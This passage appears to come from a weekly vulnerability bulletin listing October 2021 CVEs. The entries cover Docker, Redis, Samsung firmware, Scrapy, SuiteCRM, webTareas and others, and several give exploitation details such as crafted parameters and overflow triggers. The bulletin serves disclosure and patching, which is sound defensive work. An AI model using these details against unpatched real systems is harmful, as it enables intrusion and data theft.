Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where the data directory (typically `/var/lib/docker`) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as `setuid`), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. This bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers should be stopped and restarted for the permissions to be fixed. For users unable to upgrade limit access to the host to trusted users. Limit access to host volumes to trusted containers.2021-10-04not yet calculatedCVE-2021-41091
MISC
CONFIRM
myscada_mydesigner_8.20.0 -- myscada_mydesigner_8.20.0
 
mySCADA myDESIGNER 8.20.0 and below allows Directory Traversal attacks when importing project files. If an attacker can trick a victim into importing a malicious mep file, then they gain the ability to write arbitrary files to OS locations where the user has permission. This would typically lead to code execution.2021-10-04not yet calculatedCVE-2021-41578
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the add() method.2021-10-06not yet calculatedCVE-2020-21650
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\point.php, which can be exploited via the add() method.2021-10-06not yet calculatedCVE-2020-21651
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the addqq() method.2021-10-06not yet calculatedCVE-2020-21652
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sj() method.2021-10-06not yet calculatedCVE-2020-21653
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sql() method.2021-10-06not yet calculatedCVE-2020-21649
MISC
nagios_enterprises -- nagiosxi
 
Nagios Enterprises NagiosXI <= 5.8.4 contains a Server-Side Request Forgery (SSRF) vulnerability in schedulereport.php. Any authenticated user can create scheduled reports containing PDF screenshots of any view in the NagiosXI application. Due to lack of input sanitisation, the target page can be replaced with an SSRF payload to access internal resources or disclose local system files.2021-10-05not yet calculatedCVE-2021-37223
MISC
MISC
netsarang -- xshell
 
Xshell before 7.0.0.76 allows attackers to cause a crash by triggering rapid changes to the title bar.2021-10-07not yet calculatedCVE-2021-42095
MISC
node.js -- node.js
 
Node.js before 16.6.0, 14.17.4, and 12.22.4 is vulnerable to a use after free attack where an attacker might be able to exploit the memory corruption, to change process behavior.2021-10-07not yet calculatedCVE-2021-22930
MISC
MISC
october -- october_cms
 
October is a Content Management System (CMS) and web platform built on the Laravel PHP Framework. In affected versions, administrator accounts which had previously been deleted may still be able to sign in to the backend using October CMS v2.0. The issue has been patched in v2.1.12 of the october/october package. There are no workarounds for this issue and all users should update.2021-10-06not yet calculatedCVE-2021-41126
CONFIRM
MISC
octopus -- server
 
When Octopus Server is installed using a custom folder location, folder ACLs are not set correctly and could lead to an unprivileged user using DLL side-loading to gain privileged access.2021-10-07not yet calculatedCVE-2021-26556
MISC
octopus -- tentacle
 
When Octopus Tentacle is installed using a custom folder location, folder ACLs are not set correctly and could lead to an unprivileged user using DLL side-loading to gain privileged access.2021-10-07not yet calculatedCVE-2021-26557
MISC
onionshare -- onionshare
 
An information disclosure vulnerability in OnionShare 2.3 before 2.4 allows remote unauthenticated attackers to retrieve the full list of participants of a non-public OnionShare node via the --chat feature.2021-10-04not yet calculatedCVE-2021-41867
MISC
MISC
onionshare -- onionshare
 
OnionShare 2.3 before 2.4 allows remote unauthenticated attackers to upload files on a non-public node when using the --receive functionality.2021-10-04not yet calculatedCVE-2021-41868
MISC
MISC
open5gs -- open5gs
 
ogs_fqdn_parse in Open5GS 1.0.0 through 2.3.3 inappropriately trusts a client-supplied length value, leading to a buffer overflow. The attacker can send a PFCP Session Establishment Request with "internet" as the PDI Network Instance. The first character is interpreted as a length value to be used in a memcpy call. The destination buffer is only 100 bytes long on the stack. Then, 'i' gets interpreted as 105 bytes to copy from the source buffer to the destination buffer.2021-10-07not yet calculatedCVE-2021-41794
MISC
opensns -- opensns
 
OpenSNS v6.1.0 contains a blind SQL injection vulnerability in /Controller/ChinaCityController.class.php via the cid parameter.2021-10-07not yet calculatedCVE-2020-21726
MISC
opensns -- opensns
 
OpenSNS v6.1.0 contains a blind SQL injection vulnerability in /Controller/ChinaCityController.class.php via the pid parameter.2021-10-07not yet calculatedCVE-2020-21725
MISC
ping_identity -- pingfederate
 
Ping Identity PingFederate before 10.3.1 mishandles pre-parsing validation, leading to an XXE attack that can achieve XML file disclosure.2021-10-07not yet calculatedCVE-2021-41770
MISC
MISC
polycom -- poly_vvx_400/410
 
Poly VVX 400/410 through 5.3.1 allows low-privileged users to change the Admin password by modifying a POST parameter to 120 during the password reset process.2021-10-04not yet calculatedCVE-2021-41322
MISC
MISC
postgresql -- postgresql
 
A flaw was found in postgresql. Using an UPDATE ... RETURNING command on a purpose-crafted table, an authenticated database user could read arbitrary bytes of server memory. The highest threat from this vulnerability is to data confidentiality.2021-10-08not yet calculatedCVE-2021-32029
MISC
MISC
pterodactyl -- pterodactyl
 
Pterodactyl is an open-source game server management panel built with PHP 7, React, and Go. A malicious user can modify the contents of a `confirmation_token` input during the two-factor authentication process to reference a cache value not associated with the login attempt. In rare cases this can allow a malicious actor to authenticate as a random user in the Panel. The malicious user must target an account with two-factor authentication enabled, and then must provide a correct two-factor authentication token before being authenticated as that user. Due to a validation flaw in the logic handling user authentication during the two-factor authentication process, a malicious user can trick the system into loading credentials for an arbitrary user by modifying the token sent to the server. This authentication flaw is present in the `LoginCheckpointController@__invoke` method which handles two-factor authentication for a user. This controller looks for a request input parameter called `confirmation_token` which is expected to be a 64 character random alpha-numeric string that references a value within the Panel's cache containing a `user_id` value. This value is then used to fetch the user that attempted to login, and lookup their two-factor authentication token. Due to the design of this system, any element in the cache that contains only digits could be referenced by a malicious user, and whatever value is stored at that position would be used as the `user_id`. There are a few different areas of the Panel that store values into the cache that are integers, and a user who determines what those cache keys are could pass one of those keys which would cause this code pathway to reference an arbitrary user. At its heart this is a high-risk login bypass vulnerability. However, there are a few additional conditions that must be met in order for this to be successfully executed, notably: 1.) The account referenced by the malicious cache key must have two-factor authentication enabled. An account without two-factor authentication would cause an exception to be triggered by the authentication logic, thus exiting this authentication flow. 2.) Even if the malicious user is able to reference a valid cache key that references a valid user account with two-factor authentication, they must provide a valid two-factor authentication token. However, due to the design of this endpoint, once a valid user account is found with two-factor authentication enabled there is no rate-limiting present, thus allowing an attacker to brute force combinations until successful. This leads to a third condition that must be met: 3.) For the duration of this attack sequence the cache key being referenced must continue to exist with a valid `user_id` value. Depending on the specific key being used for this attack, this value may disappear quickly, or be changed by other random user interactions on the Panel, outside the control of the attacker. In order to mitigate this vulnerability the underlying authentication logic was changed to use an encrypted session store whose value the user is therefore unable to control. This completely removed the use of a user-controlled value. In addition, the code was audited to ensure this type of vulnerability is not present elsewhere.2021-10-06not yet calculatedCVE-2021-41129
MISC
MISC
MISC
CONFIRM
raymart_dg/ahmed_helal_hotel-mgmt-system -- raymart_dg/ahmed_helal_hotel-mgmt-system
 
A blind SQL injection vulnerability exists in the Raymart DG / Ahmed Helal Hotel-mgmt-system. A malicious attacker can retrieve sensitive database information and interact with the database using the vulnerable cid parameter in process_update_profile.php.2021-10-04not yet calculatedCVE-2021-41651
MISC
MISC
red_hat -- openjdk-1.8_and_openjdk-11_containers
 
An insecure modification flaw in the /etc/passwd file was found in the openjdk-1.8 and openjdk-11 containers. This flaw allows an attacker with access to the container to modify the /etc/passwd and escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.2021-10-06not yet calculatedCVE-2021-20264
MISC
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. An integer overflow bug affecting all versions of Redis can be exploited to corrupt the heap and potentially be used to leak arbitrary contents of the heap or trigger remote code execution. The vulnerability involves changing the default set-max-intset-entries configuration parameter to a very large value and constructing specially crafted commands to manipulate sets. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the set-max-intset-entries configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.2021-10-04not yet calculatedCVE-2021-32687
CONFIRM
MISC
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. An integer overflow bug in the ziplist data structure used by all versions of Redis can be exploited to corrupt the heap and potentially result in remote code execution. The vulnerability involves modifying the default ziplist configuration parameters (hash-max-ziplist-entries, hash-max-ziplist-value, zset-max-ziplist-entries or zset-max-ziplist-value) to a very large value, and then constructing specially crafted commands to create very large ziplists. The problem is fixed in Redis versions 6.2.6, 6.0.16, 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the above configuration parameters. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.2021-10-04not yet calculatedCVE-2021-32628
MISC
CONFIRM
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. When parsing an incoming Redis Standard Protocol (RESP) request, Redis allocates memory according to user-specified values which determine the number of elements (in the multi-bulk header) and size of each element (in the bulk header). An attacker delivering specially crafted requests over multiple connections can cause the server to allocate a significant amount of memory. Because the same parsing mechanism is used to handle authentication requests, this vulnerability can also be exploited by unauthenticated users. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate this problem without patching the redis-server executable is to block access to prevent unauthenticated users from connecting to Redis. This can be done in different ways: using network access control tools like firewalls, iptables, security groups, etc., or enabling TLS and requiring users to authenticate using client side certificates.2021-10-04not yet calculatedCVE-2021-32675
MISC
CONFIRM
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. The redis-cli command line tool and redis-sentinel service may be vulnerable to integer overflow when parsing specially crafted large multi-bulk network replies. This is a result of a vulnerability in the underlying hiredis library which does not perform an overflow check before calling the calloc() heap allocation function. This issue only impacts systems with heap allocators that do not perform their own overflow checks. Most modern systems do and are therefore not likely to be affected. Furthermore, by default redis-sentinel uses the jemalloc allocator which is also not vulnerable. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14.2021-10-04not yet calculatedCVE-2021-32762
CONFIRM
MISC
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. In affected versions an integer overflow bug in Redis can be exploited to corrupt the heap and potentially result in remote code execution. The vulnerability involves changing the default proto-max-bulk-len and client-query-buffer-limit configuration parameters to very large values and constructing specially crafted very large stream elements. The problem is fixed in Redis 6.2.6, 6.0.16 and 5.0.14. For users unable to upgrade, an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the proto-max-bulk-len configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.2021-10-04not yet calculatedCVE-2021-32627
MISC
CONFIRM
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. An integer overflow bug in the underlying string library can be used to corrupt the heap and potentially result in denial of service or remote code execution. The vulnerability involves changing the default proto-max-bulk-len configuration parameter to a very large value and constructing specially crafted network payloads or commands. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the proto-max-bulk-len configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.2021-10-04not yet calculatedCVE-2021-41099
MISC
CONFIRM
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. In affected versions specially crafted Lua scripts executing in Redis can cause the heap-based Lua stack to be overflowed, due to incomplete checks for this condition. This can result in heap corruption and potentially remote code execution. This problem exists in all versions of Redis with Lua scripting support, starting from 2.6. The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14. For users unable to update, an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.2021-10-04not yet calculatedCVE-2021-32626
MISC
CONFIRM
samsung -- bluetoothsettingsprovider
 
An improper access control vulnerability in BluetoothSettingsProvider prior to SMR Oct-2021 Release 1 allows an untrusted application to overwrite some Bluetooth information.2021-10-06not yet calculatedCVE-2021-25472
MISC
samsung -- cmfa_framework
 
SQL injection vulnerabilities in CMFA framework prior to SMR Oct-2021 Release 1 allow an untrusted application to overwrite some CMFA framework information.2021-10-06not yet calculatedCVE-2021-25482
MISC
samsung -- dsp_kernel_driver
 
A possible heap-based buffer overflow vulnerability in DSP kernel driver prior to SMR Oct-2021 Release 1 allows arbitrary memory write and code execution.2021-10-06not yet calculatedCVE-2021-25475
MISC
samsung -- exynos_cp_booting_drive
 
An improper error handling in Exynos CP booting driver prior to SMR Oct-2021 Release 1 allows local attackers to bypass a Secure Memory Protector of Exynos CP Memory.2021-10-06not yet calculatedCVE-2021-25481
MISC
samsung -- exynos_cp_chipset
 
A possible heap-based buffer overflow vulnerability in Exynos CP Chipset prior to SMR Oct-2021 Release 1 allows arbitrary memory write and code execution.2021-10-06not yet calculatedCVE-2021-25479
MISC
samsung -- exynos_cp_chipset
 
A possible stack-based buffer overflow vulnerability in Exynos CP Chipset prior to SMR Oct-2021 Release 1 allows arbitrary memory write and code execution.2021-10-06not yet calculatedCVE-2021-25478
MISC
samsung -- factoryaircommandmanager
 
Path traversal vulnerability in FactoryAirCommandManager prior to SMR Oct-2021 Release 1 allows attackers to write file as system UID via BT remote socket.2021-10-06not yet calculatedCVE-2021-25485
MISC
samsung -- inputmanagerservice
 
Improper authentication in InputManagerService prior to SMR Oct-2021 Release 1 allows monitoring the touch event.2021-10-06not yet calculatedCVE-2021-25484
MISC
samsung -- ipcdump
 
Exposure of information vulnerability in ipcdump prior to SMR Oct-2021 Release 1 allows an attacker to detect device information by analyzing packets in the log.2021-10-06not yet calculatedCVE-2021-25486
MISC
samsung -- keymaster
 
A keyblob downgrade attack in keymaster prior to SMR Oct-2021 Release 1 allows an attacker to trigger an IV reuse vulnerability with a privileged process.2021-10-06not yet calculatedCVE-2021-25490
MISC
samsung -- livfivextractor_library
 
Lack of boundary checking of a buffer in livfivextractor library prior to SMR Oct-2021 Release 1 allows OOB read.2021-10-06not yet calculatedCVE-2021-25483
MISC
samsung -- mediatek_rrc_protocol
 
An improper error handling in Mediatek RRC Protocol stack prior to SMR Oct-2021 Release 1 allows modem crash and remote denial of service.2021-10-06not yet calculatedCVE-2021-25477
MISC
samsung -- mfc_driver
 
A vulnerability in mfc driver prior to SMR Oct-2021 Release 1 allows memory corruption via NULL-pointer dereference.2021-10-06not yet calculatedCVE-2021-25491
MISC
samsung -- modem_interface_driver
 
Lack of boundary checking of a buffer in recv_data() of modem interface driver prior to SMR Oct-2021 Release 1 allows OOB read.2021-10-06not yet calculatedCVE-2021-25488
MISC
samsung -- modem_interface_driver
 
Assuming radio permission is gained, missing input validation in modem interface driver prior to SMR Oct-2021 Release 1 results in format string bug leading to kernel panic.2021-10-06not yet calculatedCVE-2021-25489
MISC
samsung -- modem_interface_driver
 
Lack of boundary checking of a buffer in set_skb_priv() of modem interface driver prior to SMR Oct-2021 Release 1 allows an OOB read that results in arbitrary code execution via dereference of an invalid function pointer.2021-10-06not yet calculatedCVE-2021-25487
MISC
samsung -- notes
 
Lack of boundary checking of a buffer in libSPenBase library of Samsung Notes prior to Samsung Note version 4.3.02.61 allows OOB read.2021-10-06not yet calculatedCVE-2021-25492
MISC
samsung -- notes
 
Lack of boundary checking of a buffer in libSPenBase library of Samsung Notes prior to Samsung Note version 4.3.02.61 allows OOB read.2021-10-06not yet calculatedCVE-2021-25493
MISC
samsung -- notes
 
A possible buffer overflow vulnerability in libSPenBase library of Samsung Notes prior to Samsung Note version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25494
MISC
samsung -- notes
 
A possible heap buffer overflow vulnerability in libSPenBase library of Samsung Notes prior to Samsung Note version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25495
MISC
samsung -- notes
 
A possible buffer overflow vulnerability in maetd_dec_slice of libSPenBase library of Samsung Notes prior to Samsung Notes version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25496
MISC
samsung -- notes
 
A possible buffer overflow vulnerability in maetd_cpy_slice of libSPenBase library of Samsung Notes prior to Samsung Notes version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25497
MISC
samsung -- notes
 
A possible buffer overflow vulnerability in maetd_eco_cb_mode of libSPenBase library of Samsung Notes prior to Samsung Notes version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25498
MISC
samsung -- qualcomm_modem
 
A lack of replay attack protection in GUTI REALLOCATION COMMAND message process in Qualcomm modem prior to SMR Oct-2021 Release 1 can lead to remote denial of service on mobile network connection.2021-10-06not yet calculatedCVE-2021-25480
MISC
samsung -- samsungaccountsdksigninactivity_of_galaxy_store
 
Intent redirection vulnerability in SamsungAccountSDKSigninActivity of Galaxy Store prior to version 4.5.32.4 allows an attacker to access the content provider of Galaxy Store.2021-10-06not yet calculatedCVE-2021-25499
MISC
samsung -- security_mode_command
 
A lack of replay attack protection in Security Mode Command process prior to SMR Oct-2021 Release 1 can lead to denial of service on mobile network connection and battery depletion.2021-10-06not yet calculatedCVE-2021-25471
MISC
samsung -- systemui
 
Assuming a shell privilege is gained, an improper exception handling for multi_sim_bar_hide_by_meadia_full value in SystemUI prior to SMR Oct-2021 Release 1 allows an attacker to cause a permanent denial of service in user device before factory reset.2021-10-06not yet calculatedCVE-2021-25473
MISC
samsung -- systemui
 
Assuming a shell privilege is gained, an improper exception handling for multi_sim_bar_show_on_qspanel value in SystemUI prior to SMR Oct-2021 Release 1 allows an attacker to cause a permanent denial of service in user device before factory reset.2021-10-06not yet calculatedCVE-2021-25474
MISC
samsung -- teegris_secure_os
 
An improper caller check logic of SMC call in TEEGRIS secure OS prior to SMR Oct-2021 Release 1 can be used to compromise TEE.2021-10-06not yet calculatedCVE-2021-25470
MISC
samsung -- vision_dsp_kernel_driver
 
Assuming system privilege is gained, possible buffer overflow vulnerabilities in the Vision DSP kernel driver prior to SMR Oct-2021 Release 1 allow privilege escalation to Root by hijacking a loaded library.2021-10-06not yet calculatedCVE-2021-25467
MISC
samsung -- widevine_ta
 
An information disclosure vulnerability in Widevine TA log prior to SMR Oct-2021 Release 1 allows attackers to bypass the ASLR protection mechanism in TEE.2021-10-06not yet calculatedCVE-2021-25476
MISC
samsung -- widevine_trustlet
 
A possible guess-and-confirm memory byte vulnerability in Widevine trustlet prior to SMR Oct-2021 Release 1 allows attackers to read arbitrary memory addresses.2021-10-06not yet calculatedCVE-2021-25468
MISC
samsung -- widevine_trustlet
 
A possible stack-based buffer overflow vulnerability in Widevine trustlet prior to SMR Oct-2021 Release 1 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25469
MISC
scrapy -- scrapy
 
Scrapy is a high-level web crawling and scraping framework for Python. If you use `HttpAuthMiddleware` (i.e. the `http_user` and `http_pass` spider attributes) for HTTP authentication, all requests will expose your credentials to the request target. This includes requests generated by Scrapy components, such as `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`, or requests reached through redirects. Upgrade to Scrapy 2.5.1 and use the new `http_auth_domain` spider attribute to control which domains are allowed to receive the configured HTTP authentication credentials. If you are using Scrapy 1.8 or a lower version, and upgrading to Scrapy 2.5.1 is not an option, you may upgrade to Scrapy 1.8.1 instead. If you cannot upgrade, set your HTTP authentication credentials on a per-request basis, using for example the `w3lib.http.basic_auth_header` function to convert your credentials into a value that you can assign to the `Authorization` header of your request, instead of defining your credentials globally using `HttpAuthMiddleware`.2021-10-06not yet calculatedCVE-2021-41125
MISC
MISC
CONFIRM
MISC
scrapy-splash -- scrapy-splash
 
Scrapy-splash is a library which provides Scrapy and JavaScript integration. In affected versions users who use [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth) (i.e. the `http_user` and `http_pass` spider attributes) for Splash authentication will have any non-Splash request expose your credentials to the request target. This includes `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`. Upgrade to scrapy-splash 0.8.0 and use the new `SPLASH_USER` and `SPLASH_PASS` settings instead to set your Splash authentication credentials safely. If you cannot upgrade, set your Splash request credentials on a per-request basis, [using the `splash_headers` request parameter](https://github.com/scrapy-plugins/scrapy-splash/tree/0.8.x#http-basic-auth), instead of defining them globally using the [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth). Alternatively, make sure all your requests go through Splash. That includes disabling the [robots.txt middleware](https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#topics-dlmw-robots).2021-10-05not yet calculatedCVE-2021-41124
MISC
CONFIRM
silverstripe -- silverstripe
 
In SilverStripe GraphQL Server (aka silverstripe/graphql) 3.x through 3.4.1, the default permission checker is not inherited by query subclasses.2021-10-07not yet calculatedCVE-2021-28661
MISC
MISC
silverstripe -- silverstripe_framework
 
SilverStripe Framework through 4.8.1 allows XSS.2021-10-07not yet calculatedCVE-2021-36150
MISC
MISC
sophos -- hitmanpro
 
A local attacker could read or write arbitrary files with administrator privileges in HitmanPro before version Build 318.2021-10-08not yet calculatedCVE-2021-25271
CONFIRM
sophos -- hitmanpro.alert
 
A local attacker could execute arbitrary code with administrator privileges in HitmanPro.Alert before version Build 901.2021-10-08not yet calculatedCVE-2021-25270
CONFIRM
suitecrm -- suitecrm
 
SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attacker can partially include arbitrary files via the importFile parameter of the RefreshMapping import functionality.2021-10-04not yet calculatedCVE-2021-41596
CONFIRM
CONFIRM
MISC
MISC
MISC
suitecrm -- suitecrm
 
SuiteCRM 7.10.x before 7.10.33 and 7.11.x before 7.11.22 is vulnerable to privilege escalation.2021-10-04not yet calculatedCVE-2021-41869
MISC
MISC
MISC
MISC
MISC
suitecrm -- suitecrm
 
SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attacker can partially include arbitrary files via the file_name parameter of the Step3 import functionality.2021-10-04not yet calculatedCVE-2021-41595
MISC
CONFIRM
CONFIRM
MISC
sylius -- sylius/paypalplugin
 
sylius/paypal-plugin is a PayPal plugin for the Sylius development platform. In affected versions the URL of the payment page reached after checkout was created with an autoincremented payment id (/pay-with-paypal/{id}) and was therefore easy to predict. The problem is that the credit card form has a prefilled "credit card holder" field containing the Customer's first and last name, which can lead to personally identifiable information exposure. Additionally, the mentioned form did not require authentication. The problem has been patched in Sylius/PayPalPlugin 1.2.4 and 1.3.1. If users are unable to update they can override the sylius_paypal_plugin_pay_with_paypal_form route and change its URL parameters to (for example) {orderToken}/{paymentId}, then override the Sylius\PayPalPlugin\Controller\PayWithPayPalFormAction service to operate on the payment taken from the repository by these 2 values. This would also require a custom repository method. Additionally, one could override the @SyliusPayPalPlugin/payWithPaypal.html.twig template to add a contingencies: ['SCA_ALWAYS'] line in the hostedFields.submit(...) function call (line 421). It would then have to be handled in the function callback.2021-10-05not yet calculatedCVE-2021-41120
MISC
MISC
CONFIRM
tad_book3 -- tad_book3
 
Tad Book3 editing book function does not filter special characters. Unauthenticated attackers can remotely inject JavaScript syntax and execute stored XSS attacks.2021-10-08not yet calculatedCVE-2021-41563
MISC
tad_book3 -- tad_book3
 
Tad Book3 editing book page does not perform identity verification. Remote attackers can use the vulnerability to view and modify arbitrary content of books without permission.2021-10-08not yet calculatedCVE-2021-41974
MISC
tad_honor -- tad_honor
 
Tad Honor viewing book list function is vulnerable to authorization bypass, thus remote attackers can use special parameters to delete articles arbitrarily without logging in.2021-10-08not yet calculatedCVE-2021-41564
MISC
tad_uploader -- tad_uploader
 
The new add subject parameter of Tad Uploader view book list function fails to filter special characters. Unauthenticated attackers can remotely inject JavaScript syntax and execute stored XSS attacks.2021-10-08not yet calculatedCVE-2021-41567
MISC
tad_uploader -- tad_uploader
 
Tad Uploader edit book list function is vulnerable to authorization bypass, thus remote attackers can use the function to amend the folder names in the book list without logging in.2021-10-08not yet calculatedCVE-2021-41976
MISC
tad_web -- tad_web
 
Tad Web is vulnerable to authorization bypass, thus remote attackers can exploit the vulnerability to use the original function of viewing bulletin boards and uploading files in the system.2021-10-08not yet calculatedCVE-2021-41568
MISC
tadtools -- tadtools
 
TadTools special page parameter does not properly restrict the input of specific characters, thus remote attackers can inject JavaScript syntax without logging in, and further perform reflective XSS attacks.2021-10-08not yet calculatedCVE-2021-41565
MISC
tadtools -- tadtools
 
The TadTools file upload function fails to filter file extensions, thus remote attackers can upload any type of file and execute arbitrary code without logging in.2021-10-08not yet calculatedCVE-2021-41566
MISC
tadtools -- tadtools
 
TadTools special page is vulnerable to authorization bypass, thus remote attackers can use the specific parameter to delete arbitrary files in the system without logging in.2021-10-08not yet calculatedCVE-2021-41975
MISC
teddy -- teddy
 
This affects the package teddy before 0.5.9. A type confusion vulnerability can be used to bypass input sanitization when the model content is an array (instead of a string).2021-10-07not yet calculatedCVE-2021-23447
MISC
MISC
MISC
thinkphp50-cms -- thinkphp50-cms
 
ThinkPHP50-CMS v1.0 contains a remote code execution (RCE) vulnerability in the component /public/?s=captcha.2021-10-07not yet calculatedCVE-2020-21865
MISC
tracker -- ardour
 
Ardour v5.12 contains a use-after-free vulnerability in the component ardour/libs/pbd/xml++.cc when using xmlFreeDoc and xmlXPathFreeContext.2021-10-08not yet calculatedCVE-2020-22617
MISC
MISC
trend_micro -- multiple_products
 
An arbitrary file creation by privilege escalation vulnerability in Trend Micro Apex One, Apex One as a Service, Worry-Free Business Security 10.0 SP1, and Worry-Free Business Security Services could allow a local attacker to create an arbitrary file with higher privileges that could lead to a denial-of-service (DoS) on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.2021-10-06not yet calculatedCVE-2021-3848
MISC
verint -- workforce_optimization
 
Verint Workforce Optimization (WFO) 15.2.5.1033 allows HTML injection via the /wfo/control/signin username parameter.2021-10-08not yet calculatedCVE-2021-41825
MISC
MISC
visual_tools -- dvr_vx16
 
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py Uaer-Agent HTTP header.2021-10-07not yet calculatedCVE-2021-42071
MISC
MISC
vitec -- exterity_iptv_products
 
VITEC Exterity IPTV products through 2021-04-30 allow privilege escalation to root.2021-10-08not yet calculatedCVE-2021-42109
MISC
MISC
vyperlang -- vyper
 
Vyper is a Pythonic Smart Contract Language for the EVM. In affected versions external functions did not properly validate the bounds of decimal arguments. The can lead to logic errors. This issue has been resolved in version 0.3.0.2021-10-05not yet calculatedCVE-2021-41122
CONFIRM
MISC
vyperlang -- vyper
 
Vyper is a Pythonic Smart Contract Language for the EVM. In affected versions when performing a function call inside a literal struct, there is a memory corruption issue that occurs because of an incorrect pointer to the the top of the stack. This issue has been resolved in version 0.3.0.2021-10-06not yet calculatedCVE-2021-41121
CONFIRM
MISC
waimai -- waimai_super_cms
 
waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php?m=Config&a=add.2021-10-05not yet calculatedCVE-2020-21506
MISC
waimai -- waimai_super_cms
 
waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php?&m=Public&a=login.2021-10-05not yet calculatedCVE-2020-21504
MISC
waimai -- waimai_super_cms
 
waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php/Link/addsave.2021-10-05not yet calculatedCVE-2020-21505
MISC
waimai -- waimai_super_cms
 
waimai Super Cms 20150505 has a logic flaw allowing attackers to modify a price, before form submission, by observing data in a packet capture. By setting the index.php?m=gift&a=addsave credit parameter to -1, the product is sold for free.2021-10-05not yet calculatedCVE-2020-21503
MISC
wdja -- wdja
 
WDJA CMS v1.5.2 contains an arbitrary file deletion vulnerability in the component admin/cache/manage.php.2021-10-06not yet calculatedCVE-2020-21648
MISC
wdja -- wdja
 
A Cross-Site Request Forgery (CSRF) in WDJA CMS v1.5.2 allows attackers to arbitrarily add administrator accounts via a crafted URL.2021-10-06not yet calculatedCVE-2020-21658
MISC
webtareas -- webtareas
 
webTareas version 2.4 and earlier allows an authenticated user to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and achieve a Reflected Cross-Site Scripting attack against the platform users and administrators. The issue affects every endpoint on the application because it is related on how each URL is echoed back on every response page.2021-10-08not yet calculatedCVE-2021-41918
MISC
webtareas -- webtareas
 
webTareas version 2.4 and earlier allows an unauthenticated user to perform Time and Boolean-based blind SQL Injection on the endpoint /includes/library.php, via the sor_cible, sor_champs, and sor_ordre HTTP POST parameters. This allows an attacker to access all the data in the database and obtain access to the webTareas application.2021-10-08not yet calculatedCVE-2021-41920
MISC
webtareas -- webtareas
 
webTareas version 2.4 and earlier allows an authenticated user to arbitrarily upload potentially dangerous files without restrictions. This is working by adding or replacing a personal profile picture. The affected endpoint is /includes/upload.php on the HTTP POST data. This allows an attacker to exploit the platform by injecting code or malware and, under certain conditions, to execute code on remote user browsers.2021-10-08not yet calculatedCVE-2021-41919
MISC
webtareas -- webtareas
 
A Cross-Site Request Forgery (CSRF) vulnerability in webTareas version 2.4 and earlier allows a remote attacker to create a new administrative profile and add a new user to the new profile. without the victim's knowledge, by enticing an authenticated admin user to visit an attacker's web page.2021-10-08not yet calculatedCVE-2021-41916
MISC
webtareas -- webtareas
 
